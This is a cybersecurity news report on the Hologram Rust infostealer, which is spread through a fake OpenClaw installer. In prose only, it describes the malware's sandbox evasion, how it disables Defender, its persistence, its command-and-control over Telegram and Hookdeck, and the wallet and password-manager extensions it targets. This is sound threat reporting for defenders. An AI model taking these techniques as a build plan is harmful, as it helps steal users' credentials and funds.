Cybersecurity Alert: New Infostealer Framework Hologram Targets Crypto Wallets
Recent cybersecurity developments have unveiled a sophisticated malware campaign led by hackers leveraging a deceptive OpenClaw installer to distribute a modular Rust-based infostealer framework known as Hologram. This insidious framework is specifically designed to harvest credentials from over 250 browser extensions associated with crypto wallets and password managers while cleverly disguising its malicious intent behind reputable cloud and messaging services.
The Deceptive Installer
A thorough investigation has highlighted a website that delivers a malicious archive named OpenClaw_x64.7z. This archive contains a sizeable 130MB Rust-compiled executable, referred to as OpenClaw_x64.exe. To enhance its deceptive appearance, the executable is padded with counterfeit documentation, making it seem legitimate. This strategy helps it evade antivirus detection, particularly by sidestepping file size scanning thresholds and common sandbox upload limits.
Upon further scrutiny, the portable executable (PE) manifest claims to be version v1.7.16, with the label “Hologram” and a description that reads “Decoy entity generator for tactical misdirection.” This blatant admission of purpose leaves little room for misinterpretation regarding the framework’s true goals.
Netskope, a cybersecurity firm, has been tracking this malware component, identifying it as a novel Rust dropper active since at least February 2026. This discovery has been linked to the broader fake OpenClaw campaign previously documented by Huntress.
The Trickery Behind the Malware
The cybercriminals behind the Hologram framework have utilized a convincingly counterfeit OpenClaw download site, available at openclaw-installer.com, which was registered in March 2026 on Chinese infrastructure and is cloaked using Cloudflare’s services. Notably, this fake site links to a typosquatted GitHub organization, openclaw-install/openclaw-installer, rather than the legitimate openclaw/openclaw project.
An intriguing feature of this dropper is its implementation of layered anti-virtual machine checks. Before engaging in any harmful activities, it conducts several checks on the environment, such as analyzing BIOS strings, verifying sandbox DLLs, examining MAC prefixes, and scrutinizing blocked usernames. It further profiles the hardware and environment by assessing GPU specifications, CPU core counts, RAM, disk size, active processes, and screen resolution.
Additionally, the malware employs a “mouse gate” mechanism, which halts its execution until it detects real mouse movement. This tactic effectively thwarts many automated sandboxes that lack interactive user input, ensuring that the malware executes only on genuine machines.
Execution and Information Theft
Once these checks confirm an actual user environment, Hologram proceeds to decode and execute a convoluted PowerShell payload. This payload performs several critical tasks: it disables Microsoft Defender, establishes inbound firewall rules on specific ports, and retrieves a password from a designated dead-drop URL, which is then used to download a password-protected 7z archive containing six stage-two binaries.
The framework’s second-stage module, internally labeled as stealth_packer, comprises six Rust-based components that establish persistent connections, command-and-control channels, and facilitate fileless payload deliveries.
Upon execution, Hologram presents a graphical user interface (GUI)-based installer, complete with User Account Control prompts implemented through the Iced/wgpu graphics framework. This setup further reinforces the illusion of a legitimate installation process.
Command-and-Control Infrastructure
The various modules, including virtnetwork.exe and svc_service.exe, are tasked with HTTPS beaconing to an illicit Brazilian law firm subdomain and a DigitalOcean-hosted IP address on ports opened earlier by PowerShell. Another component, onedrive_sync.exe, is engineered to decrypt and execute embedded payloads entirely from memory using the memexec crate and direct NT system calls.
During installation, the framework downloads a browser extension manifest from the attackers’ Azure DevOps organization disguised as a .7z file, but it is actually plaintext. This manifest includes a list of targeted crypto wallet extensions such as MetaMask, Phantom, and Coinbase, alongside an array of password managers like Bitwarden and Google Authenticator. Notably, since this list is stored in a Git repository rather than within the binaries, operators can update the targeted wallets and managers dynamically without recompiling the malware.
The campaign also utilizes an advanced technique, leveraging the clroxide Rust crate, which hosts the .NET Common Language Runtime (CLR) inside a native Rust process, enabling svc_service.exe to load mscoree.dll and execute embedded .NET assemblies entirely in memory.
Mitigation Challenges
This malware employs multiple persistence techniques, including registry Run keys, WinLogon UserInit hijacking, scheduled tasks, and redundant Telegram-based droppers, thus complicating its removal. Command-and-control communications are executed via a combination of hijacked domains, DigitalOcean infrastructure, and configuration through Telegram.
Furthermore, the use of Hookdeck as an application-layer relay for Telegram bot communication represents a significant milestone as it marks the first publicly documented instance of this platform being utilized for malicious command-and-control purposes.
Continual domain rotations, combined with frequent updates to cloud endpoints without the need to modify binaries, imply that simplistic IP and domain blocking will only yield temporary solutions for defenders.
Conclusion
This evolving cyber threat underlines the critical importance of vigilance regarding developer tools and browser extensions within organizations. The stealthy nature of the Hologram infostealer framework, with its integrated Rust binaries and real-time command-and-control capabilities hidden within trusted services, necessitates a more robust approach to cybersecurity. Enterprises must implement deep application-layer inspections, enforce stringent browser extension governance, and develop behavioral detection systems capable of identifying stealthy credential harvesting tactics to counteract this increasing menace.